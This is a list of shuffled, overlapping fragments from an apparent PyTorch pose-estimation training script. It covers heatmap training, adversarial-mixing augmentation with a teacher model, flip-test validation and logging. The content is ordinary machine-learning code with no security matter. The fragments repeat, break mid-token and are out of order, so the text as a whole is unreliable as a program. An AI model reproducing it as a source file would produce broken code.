"get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis", "and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None,", "1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix)", "= F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index", "global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input,", "average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg", "models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G", "i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config, tmp, copy.deepcopy(meta),", "output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not", "loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm", "writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch", "if not cpu: target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss", "= model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward()", "end = time.time() if i % config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t'", ") all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums =", "if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f}", "evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples, config.MODEL.NUM_JOINTS, 3), dtype=np.float32", "D_output_detach = model(tmp.detach()) with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight)", "time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start)", "writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps + 1 prefix =", "_ in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else:", "optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp +=", "{:.3f}'.format(value) for value in values]) + ' |' ) class AverageMeter(object): \"\"\"Computes and", "'valid', dict(name_values), global_steps ) writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator #", "target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient and", "loss = criterion(outputs, target, target_weight) # compute gradient and do update step optimizer.zero_grad()", "2:3] = maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2]", "image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0: msg = 'Test:", "from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import", "'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy", "# feature is not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP:", "torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize() time_gpu +=", ":, 1:] = \\ output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped)", "the MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import", "* mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1) D_output_detach", "= outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list):", "list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer", "if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps )", "shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] =", "'{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True):", "_tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn from tqdm import", "is :', time_gpu / len(val_loader)) name_values, perf_indicator = val_dataset.evaluate( config, all_preds, output_dir, all_boxes,", "save_debug_images import torch.nn as nn from tqdm import tqdm import torch.nn.functional as F", "\\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i,", "is not aligned, shift flipped heatmap for higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :,", "optimizer.step() # G: compute gradient and do update step set_require_grad(model, False) optimizer_G.zero_grad() outputs", "under the MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__", "outputs = model(tmp) output = outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight", "in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda() # compute output torch.cuda.synchronize() infer_start", "list): output = outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3)", "loss = criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and record", "outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets = [nets] for", "measure accuracy and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output,", "train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time =", "output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped,", "_print_name_value(name_value, full_arch_name): names = name_value.keys() values = name_value.values() num_values = len(name_value) logger.info( '|", "tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args, train_loader, model,", "mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _", "torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output,", "batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss',", "cnt) batch_time.update(time.time() - end) end = time.time() # corresponding center scale joint c", "i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i )", "+ num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3]", "target_weight) loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward()", "'|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...' logger.info( '| '", "target, target_weight) # compute gradient and do update step optimizer.zero_grad() loss.backward() optimizer.step() #", "= time.time() torch.cuda.synchronize() time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output =", "measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs,", "num_values = len(name_value) logger.info( '| Arch ' + ' '.join(['| {}'.format(name) for name", "AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model = models[0].train()", "+ ' |' ) class AverageMeter(object): \"\"\"Computes and stores the average and current", "\\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc)", "feat_dict = {} with torch.no_grad(): end = time.time() time_gpu = 0. for i,", "nets: if net is not None: for param in net.parameters(): param.requires_grad = requires_grad", "list): for name_value in name_values: writer.add_scalars( 'valid', dict(name_value), global_steps ) else: writer.add_scalars( 'valid',", "\\ 'Speed {speed:.1f} samples/s\\t' \\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\", "metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if", "i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)): if not cpu: input = input.cuda()", "model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc", "* args.alpha loss_D.backward() optimizer.step() # G: compute gradient and do update step set_require_grad(model,", "val_dataset.evaluate( config, all_preds, output_dir, all_boxes, image_path, filenames, imgnums ) model_name = config.MODEL.NAME if", "= 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy", "tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config, args,", "import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat,", "output, prefix) print('=> The average inference time is :', time_gpu / len(val_loader)) name_values,", "model = model[0].train() model_D = model[1].train() else: model.train() end = time.time() for i,", "if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if", "|' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name =", "requires_grad def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch, output_dir, tb_log_dir, writer_dict): batch_time", "torch.nn as nn from tqdm import tqdm import torch.nn.functional as F logger =", "time_gpu += (infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else: output", "end) outputs = model(input) target = target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True)", "({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=input.size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc)", "pred = accuracy(output, target, args=None, cfg=config) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end =", "prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix +", "score image_path.extend(meta['image']) idx += num_images if i % config.PRINT_FREQ == 0: msg =", "import absolute_import from __future__ import division from __future__ import print_function import time import", "config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name)", "output_flipped.clone()[:, :, :, 0:-1] output = (output + output_flipped) * 0.5 if not", "{loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses,", ") writer_dict['valid_global_steps'] = global_steps + 1 return name_values, perf_indicator # markdown format output", "criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy and record loss losses.update(loss.item(),", "update step optimizer.zero_grad() loss.backward() optimizer.step() # measure accuracy and record loss losses.update(loss.item(), input.size(0))", "optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets, target_weights, metas) in", "+ ' |' ) logger.info('|---' * (num_values+1) + '|') if len(full_arch_name) > 15:", "= optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets, target_weights,", "get_final_preds( config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:,", "end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True)", "epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter()", "= maxvals # double check this all_boxes parts all_boxes[idx:idx + num_images, 0:2] =", "= AverageMeter() data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model,", "losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred = accuracy(outputs, target, args=None, cfg=config) outputs =", "\\ 'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\\t' \\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch,", "loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha) +", "cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() # switch to", "name in names]) + ' |' ) logger.info('|---' * (num_values+1) + '|') if", "if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped =", "model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped =", "'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if", "'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time,", "'{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config, input, meta, target_hm, pred * 4, output,", "flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as", "= AverageMeter() if isinstance(models, list): model = models[0].train() model_G = models[1].train() model_teacher =", "in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs,", "criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter() losses = AverageMeter() acc =", "+ '_clean') save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs, prefix) def validate(config, args, val_loader,", "# switch to evaluate mode model.eval() num_samples = len(val_dataset) all_preds = np.zeros( (num_samples,", "tqdm(enumerate(train_loader)): data_time.update(time.time() - end) # mask_channel = meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list):", "and record loss losses.update(loss_D.item(), inputs[0].size(0)) _, avg_acc, cnt, pred = accuracy(output, target, args=None,", "= '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean')", "losses = AverageMeter() acc = AverageMeter() # switch to evaluate mode model.eval() num_samples", "acc=acc) logger.info(msg) writer = writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val,", "num_images, 4] = np.prod(s*200, 1) all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx", "val, n=1): self.val = val self.sum += val * n self.count += n", "= meta['model_supervise_channel'] > 0.5 if isinstance(inputs, list): inputs = [_.cuda(non_blocking=True) for _ in", "model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G =", "\\ 'Loss {loss.val:.5f} ({loss.avg:.5f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val,", "dtype=np.float32 ) all_boxes = np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums", "higher accuracy if config.TEST.SHIFT_HEATMAP: output_flipped[:, :, :, 1:] = \\ output_flipped.clone()[:, :, :,", "current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0", "0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals # double check this all_boxes", "{loss.val:.4f} ({loss.avg:.4f})\\t' \\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix", "= meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals = get_final_preds( config,", "= time.time() time_gpu = 0. for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)):", "* 4, output, prefix) print('=> The average inference time is :', time_gpu /", "output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() # corresponding", "compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end = time.time() torch.cuda.synchronize()", ") model_name = config.MODEL.NAME if isinstance(name_values, list): for name_value in name_values: _print_name_value(name_value, model_name)", "from tqdm import tqdm import torch.nn.functional as F logger = logging.getLogger(__name__) def train(config,", "= torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0]", "self.count = 0 def update(self, val, n=1): self.val = val self.sum += val", "None: for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models,", "else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss',", "' '.join(['| {}'.format(name) for name in names]) + ' |' ) logger.info('|---' *", "isinstance(model, list): model = model[0].train() model_D = model[1].train() else: model.train() end = time.time()", "optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets,", "config.PRINT_FREQ == 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed", "* (num_values+1) + '|') if len(full_arch_name) > 15: full_arch_name = full_arch_name[:8] + '...'", "num_images if i % config.PRINT_FREQ == 0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time", "= target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight) num_images = input.size(0) # measure accuracy", "target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input = torch.cat(inputs, dim=1) mix_weight", "target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 -", "if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda() else: output_flipped = torch.from_numpy(output_flipped.copy()) # feature is", "input.cuda() # compute output torch.cuda.synchronize() infer_start = time.time() outputs = model(input) infer_end =", "# corresponding center scale joint c = meta['center'].numpy() s = meta['scale'].numpy() score =", "in inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs", "(1 - args.alpha) + loss_D_kd * args.alpha loss_D.backward() optimizer.step() # G: compute gradient", "[] imgnums = [] idx = 0 feat_dict = {} with torch.no_grad(): end", "'| Arch ' + ' '.join(['| {}'.format(name) for name in names]) + '", "writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values,", "+ ' ' + ' '.join(['| {:.3f}'.format(value) for value in values]) + '", "= '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4, outputs, prefix) def set_require_grad(nets,", "= [] idx = 0 feat_dict = {} with torch.no_grad(): end = time.time()", "for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs =", "= global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm,", "target_hm, pred*4, outputs, prefix) def set_require_grad(nets, requires_grad=True): if not isinstance(nets, list): nets =", "optimizers[0] optimizer_G = optimizers[1] end = time.time() for i, (inputs, targets, target_weights, metas)", "criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1", "pred = accuracy(output, target, args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() -", "0: msg = 'Test: [{0}/{1}]\\t' \\ 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t' \\ 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'", "# Copyright (c) Microsoft # Licensed under the MIT License. # Written by", ":, 0:2] = preds[:, :, 0:2] all_preds[idx:idx + num_images, :, 2:3] = maxvals", "(infer_end - infer_start) if isinstance(outputs, list): output = outputs[-1] else: output = outputs", "Arch ' + ' '.join(['| {}'.format(name) for name in names]) + ' |'", "= models[2].eval() else: models.train() optimizer = optimizers[0] optimizer_G = optimizers[1] end = time.time()", "logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir,", "= outputs[-1] else: output = outputs if config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped =", "= AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(model, list): model =", "_print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps'] writer.add_scalar( 'valid_loss', losses.avg,", "args=None, cfg=config) output = _tocuda(output) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time()", "_print_name_value(name_value, model_name) else: _print_name_value(name_values, model_name) if writer_dict: writer = writer_dict['writer'] global_steps = writer_dict['valid_global_steps']", "== 0: msg = 'Epoch: [{0}][{1}/{2}]\\t' \\ 'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\\t' \\ 'Speed {speed:.1f}", "list): inputs = [_.cuda(non_blocking=True) for _ in inputs] target = targets[0].cuda(non_blocking=True) target_weight =", "mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for", "{acc.val:.3f} ({acc.avg:.3f})'.format( i, len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'),", "'{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs, prefix + '_clean') save_debug_images(config,", "data_time = AverageMeter() losses = AverageMeter() acc = AverageMeter() if isinstance(models, list): model", "= c[:, 0:2] all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2] all_boxes[idx:idx + num_images,", "global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, input, meta, target_hm, pred*4,", "= global_steps + 1 prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i) save_debug_images(config, inputs[0], copy.deepcopy(meta), target,", "from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm,", "target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute", "np.zeros((num_samples, 6)) image_path = [] filenames = [] imgnums = [] idx =", "= input.size(0) # measure accuracy and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt,", "torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms", "input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else:", "config, args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :,", "joint c = meta['center'].numpy() s = meta['scale'].numpy() score = meta['score'].numpy() preds, maxvals =", "coord_norm, inv_coord_norm, _tocopy, _tocuda from utils.vis import save_debug_images import torch.nn as nn from", "torch.no_grad(): end = time.time() time_gpu = 0. for i, (input, target, target_weight, meta)", "for param in net.parameters(): param.requires_grad = requires_grad def train_advmix(config, args, train_loader, models, criterion,", "train_loader, model, criterion, optimizer, epoch, output_dir, tb_log_dir, writer_dict): batch_time = AverageMeter() data_time =", "= target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(outputs, target, target_weight) # compute gradient", "stores the average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val =", "outputs loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight loss_G.backward() optimizer_G.step() # measure accuracy", "config.TEST.FLIP_TEST: input_flipped = input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1]", "output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2] all_preds[idx:idx", "= targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs = inputs.cuda(non_blocking=True) G_input", "= 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val", "len(val_loader), batch_time=batch_time, loss=losses, acc=acc) logger.info(msg) prefix = '{}_{}'.format( os.path.join(output_dir, 'val'), i ) save_debug_images(config,", "if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(),", "(input, target, target_weight, meta) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end) outputs = model(input) target", "end = time.time() # corresponding center scale joint c = meta['center'].numpy() s =", "by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division", "MIT License. # Written by <NAME> (<EMAIL>) # ------------------------------------------------------------------------------ from __future__ import absolute_import", "import torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from", "= time.time() for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)): data_time.update(time.time() - end)", "all_boxes[idx:idx + num_images, 5] = score image_path.extend(meta['image']) idx += num_images if i %", "cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ == 0:", "nets = [nets] for net in nets: if net is not None: for", "'...' logger.info( '| ' + full_arch_name + ' ' + ' '.join(['| {:.3f}'.format(value)", "writer_dict['writer'] global_steps = writer_dict['train_global_steps'] writer.add_scalar('train_loss', losses.val, global_steps) writer.add_scalar('train_acc', acc.val, global_steps) writer_dict['train_global_steps'] = global_steps", "and record loss losses.update(loss.item(), num_images) _, avg_acc, cnt, pred = accuracy(output, target, args=None,", "G_input = torch.cat(inputs, dim=1) mix_weight = F.softmax(model_G(G_input), dim=1) set_require_grad(model, True) optimizer.zero_grad() tmp =", "' + ' '.join(['| {:.3f}'.format(value) for value in values]) + ' |' )", "model = models[0].train() model_G = models[1].train() model_teacher = models[2].eval() else: models.train() optimizer =", "True) optimizer.zero_grad() tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1) for list_index in range(1, len(inputs)): tmp", "with torch.no_grad(): teacher_output = model_teacher(inputs[0]) loss_D_hm = criterion(D_output_detach, target, target_weight) loss_D_kd = criterion(D_output_detach,", "= target[0].cuda(non_blocking=True) target_hm = target target_weight = target_weight.cuda(non_blocking=True) loss = criterion(output, target, target_weight)", "val self.sum += val * n self.count += n self.avg = self.sum /", "validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time = AverageMeter()", "inputs] target = targets[0].cuda(non_blocking=True) target_weight = target_weights[0].cuda(non_blocking=True) meta = metas[0] else: inputs =", "the average and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0", "args, output.clone().cpu().numpy(), c, s) all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2]", "\\ 'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg)", "input.flip(3) outputs_flipped = model(input_flipped) if isinstance(outputs_flipped, list): output_flipped = outputs_flipped[-1] else: output_flipped =", "and current value\"\"\" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg =", "output_flipped = outputs_flipped output_flipped = flip_back(output_flipped.cpu().numpy(), val_dataset.flip_pairs) if not cpu: output_flipped = torch.from_numpy(output_flipped.copy()).cuda()", "print_function import time import logging import os, copy import numpy as np import", "as np import torch from core.evaluate import accuracy from core.inference import get_final_preds, get_final_preds_using_softargmax,", "target_weight) loss_D_kd = criterion(D_output_detach, teacher_output, target_weight) loss_D = loss_D_hm * (1 - args.alpha)", "losses.avg, global_steps ) writer.add_scalar( 'valid_acc', acc.avg, global_steps ) if isinstance(name_values, list): for name_value", "core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy,", "prefix) def validate(config, args, val_loader, val_dataset, model, criterion, output_dir, tb_log_dir, writer_dict=None, cpu=False): batch_time", "# measure accuracy and record loss losses.update(loss.item(), input.size(0)) _, avg_acc, cnt, pred =", "F logger = logging.getLogger(__name__) def train(config, args, train_loader, model, criterion, optimizer, epoch, output_dir,", "({acc.avg:.3f})'.format( epoch, i, len(train_loader), batch_time=batch_time, speed=inputs[0].size(0)/batch_time.val, data_time=data_time, loss=losses, acc=acc) logger.info(msg) writer = writer_dict['writer']", "requires_grad=True): if not isinstance(nets, list): nets = [nets] for net in nets: if", "_tocuda(outputs) acc.update(avg_acc, cnt) batch_time.update(time.time() - end) end = time.time() if i % config.PRINT_FREQ", "def 